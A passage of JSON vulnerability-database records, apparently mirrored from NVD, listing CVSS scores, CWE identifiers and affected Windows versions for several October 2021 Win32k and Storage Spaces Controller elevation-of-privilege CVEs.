"AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449", "CVE-2021-40450", "CVE-2021-41357"], "modified": "2021-10-19T18:17:00", "cpe": ["cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-41357", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41357", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-23T19:14:21", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40449, CVE-2021-41357.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40450", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449", "CVE-2021-40450", "CVE-2021-41357"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:20h2"], "id": "CVE-2021-40450", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40450", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-05-23T19:14:22", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40450, CVE-2021-41357.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40449", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449", "CVE-2021-40450", "CVE-2021-41357"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:*", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-40449", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40449", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:16:55", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26441, CVE-2021-40478, CVE-2021-40488, CVE-2021-40489.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-41345", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2021-10-19T17:28:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2021-41345", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41345", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-23T19:14:30", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40478, CVE-2021-40488, CVE-2021-40489, CVE-2021-41345.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-26441", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:20h2"], "id": "CVE-2021-26441", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26441", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-03-23T19:09:34", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26441, CVE-2021-40478, CVE-2021-40489, CVE-2021-41345.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40488", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2021-10-19T15:52:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2021-40488", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40488", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:09:20", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26441, CVE-2021-40488, CVE-2021-40489, CVE-2021-41345.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40478", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2021-10-19T15:21:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2021-40478", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40478", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:09:34", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26441, CVE-2021-40478, CVE-2021-40488, CVE-2021-41345.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40489", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2021-10-19T15:56:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-40489", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40489", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", 